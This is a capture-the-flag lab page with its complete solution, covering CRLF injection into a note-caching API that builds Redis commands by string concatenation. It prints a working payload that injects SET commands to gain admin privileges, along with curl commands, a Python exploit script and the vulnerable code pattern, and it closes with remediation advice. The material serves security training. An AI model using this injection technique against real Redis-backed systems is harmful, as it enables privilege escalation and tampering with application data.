Avatar

Labs / Redis Cache Poisoner

  • Daily Challenge
  • Released 04 Sep 2025

💉 Can you inject Redis commands through their note caching system?

A note caching API constructs Redis commands using string concatenation, creating opportunities for CRLF injection attacks. When user input meets insufficient sanitization, even simple note storage can become a pathway to Redis command injection and session manipulation. 🎯 Time to test your protocol injection skills!

1
Flags
1
Points
Daily Challenge
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Daily Challenge

💉 Redis Cache Poisoner - Complete CRLF Injection Solution

Objective: Exploit CRLF injection in the note caching API to inject arbitrary Redis commands that manipulate session data and gain admin privileges to retrieve the flag.
🔍 Step 1: Understanding CRLF Injection in Redis

CRLF (Carriage Return Line Feed) injection occurs when user input containing \r\n characters is used to construct protocol commands without proper sanitization. In Redis, commands are terminated by CRLF, allowing attackers to inject additional commands.

Normal Redis Command:
SET user_note:user "my note"

With CRLF Injection:
SET user_note:user "test"\r\nSET redis_admin_user user\r\nSET redis_session_user true\r\n

Results in Multiple Commands:
SET user_note:user "test"
SET redis_admin_user user
SET redis_session_user true
🔍 Step 2: Application Analysis

Navigate to to access the SecureCache Analytics Platform. The application provides a note caching system that stores user notes in Redis.

Available Credentials:

  • Regular User: username: user, password: user123
  • Admin credentials are NOT provided - exploitation is required

Key API Endpoints:

  • POST /api/cache-note - Cache user notes (vulnerable to CRLF injection)
  • GET /api/admin/status - Check admin status (reads from Redis)
  • GET /api/admin/flag - Admin-only flag endpoint
🔍 Step 3: Vulnerable Code Analysis

The application constructs Redis commands using dangerous string concatenation:

# VULNERABLE: Direct string concatenation
redis_command = f"SET user_note:{username} \"{note}\""

# Sent via raw socket without sanitization
sock.send(command.encode() + b'\r\n')

This construction allows CRLF injection because:

  • User input (note) is directly concatenated into the command
  • No sanitization of \r\n characters
  • Commands are sent via raw socket, allowing protocol manipulation
🔍 Step 4: Exploitation Strategy

The attack works by:

  1. Injecting CRLF characters to terminate the current SET command
  2. Injecting additional SET commands to poison Redis cache
  3. Setting admin session flags that the application checks
  4. Gaining admin privileges through poisoned cache data
🔍 Step 5: Step-by-Step Exploitation
Step 1: Initial Login
# Login as regular user
curl -X POST /login \
  -d "username=user&password=user123" \
  -c cookies.txt

# Expected response:
# {"status":"success","message":"User login successful"}
Step 2: Verify Initial Status
# Check initial admin status
curl -X GET /api/admin/status \
  -b cookies.txt

# Expected response:
# {"admin_access":false,"is_admin":false}
🔍 Step 6: CRLF Injection Attack

The critical payload that performs the CRLF injection:

CRLF Injection Payload:
test"\r\nSET redis_admin_user user\r\nSET redis_session_user true\r\nSET dummy "value

Payload Breakdown:

  • test" - Closes the original SET command's quoted string
  • \r\n - CRLF characters to terminate the command
  • SET redis_admin_user user - Injects admin session data
  • \r\n - Terminates the injected command
  • SET redis_session_user true - Sets admin flag
  • \r\n - Terminates the second injected command
  • SET dummy "value - Starts a dummy command (quotes will be balanced by application)
🔍 Step 7: Execute the Attack
Using cURL
# Execute CRLF injection
curl -X POST /api/cache-note \
  -H "Content-Type: application/json" \
  -d '{"note":"test\"\r\nSET redis_admin_user user\r\nSET redis_session_user true\r\nSET dummy \"value"}' \
  -b cookies.txt
Expected Response
# Multiple +OK responses indicate success
{
  "status": "success",
  "redis_response": "+OK\r\n+OK\r\n+OK\r\n+OK\r\n"
}
🔍 Step 8: Verify Cache Poisoning

Check if the Redis cache was successfully poisoned:

# Check admin status after injection
curl -X GET /api/admin/status -b cookies.txt

# Expected response after successful injection:
{
  "username": "user",
  "is_admin": true,
  "admin_access": true,
  "redis_admin_user": "user",
  "redis_flag_access": "true"
}
🔍 Step 9: Flag Retrieval

With admin privileges gained through cache poisoning, access the flag:

# Access admin flag endpoint
curl -X GET /api/admin/flag -b cookies.txt

# Expected response:
{
  "flag": "747f367c-21b0-4cd8-95d1-c3d8f2606aea",
  "message": "Congratulations! You have successfully exploited the Redis cache poisoning vulnerability.",
  "timestamp": 1756912914
}
🔍 Step 10: Alternative Exploitation Methods
Browser Method
  1. Navigate to /login
  2. Login with user:user123
  3. Use browser dev tools to send POST request to /api/cache-note with CRLF payload
  4. Check /api/admin/status for admin access
  5. Access /api/admin/flag for the flag
Burp Suite Method
  1. Intercept login request
  2. Login as regular user
  3. Intercept note caching request
  4. Modify note parameter with CRLF payload
  5. Forward request and verify admin access
  6. Access admin flag endpoint
Python Script
import requests

s = requests.Session()
s.post('http:///login',
  data={'username': 'user', 'password': 'user123'})

payload = 'test"\r\nSET redis_admin_user user\r\nSET redis_session_user true\r\nSET dummy "value'
s.post('http:///api/cache-note',
  json={'note': payload})

r = s.get('http:///api/admin/flag')
print(r.json()['flag'])
🔍 Step 11: Understanding the Vulnerability

The CRLF injection works because:

# Original intended command:
SET user_note:user "test"

# After CRLF injection:
SET user_note:user "test"
SET redis_admin_user user
SET redis_session_user true
SET dummy "value"

# The application executes all commands sequentially

Key vulnerability factors:

  • String Concatenation: Direct concatenation without sanitization
  • Raw Socket Communication: Bypasses Redis client protections
  • Protocol Manipulation: CRLF characters control command boundaries
  • Trust in Cache Data: Application trusts Redis data for authorization
🔍 Step 12: Cache Debugging

You can verify the injected data using the debugging endpoints:

# List all Redis keys
curl -X GET /api/cache/keys -b cookies.txt

# Get specific injected values
curl -X GET /api/cache/get/redis_admin_user -b cookies.txt
curl -X GET /api/cache/get/redis_session_user -b cookies.txt
🔍 Step 13: Security Implications

CRLF injection in Redis can lead to:

  • Command Injection: Execute arbitrary Redis commands
  • Cache Poisoning: Manipulate cached application data
  • Session Hijacking: Modify session-related cache entries
  • Privilege Escalation: Gain unauthorized admin access
  • Data Manipulation: Alter application state through cache
  • Denial of Service: Corrupt cache data or overload Redis
🔍 Step 14: Remediation Strategies

To prevent CRLF injection in Redis:

  • Input Sanitization: Escape or remove \r\n characters from user input
  • Parameterized Commands: Use Redis client libraries instead of raw sockets
  • Input Validation: Whitelist allowed characters in user input
  • Least Privilege: Don't use cache data for authorization decisions
  • Protocol Validation: Validate command structure before execution
  • Security Testing: Regular testing for injection vulnerabilities
Flag Location: The flag is accessible at /api/admin/flag after successfully exploiting CRLF injection to poison Redis cache with admin session data. The complete attack chain: Login → CRLF Inject → Gain Admin → Retrieve Flag.
Real-World Application: This challenge demonstrates realistic CRLF injection techniques commonly found in applications that construct protocol commands using string concatenation. The Redis command injection approach is based on actual CTF challenges and real-world vulnerabilities in caching systems.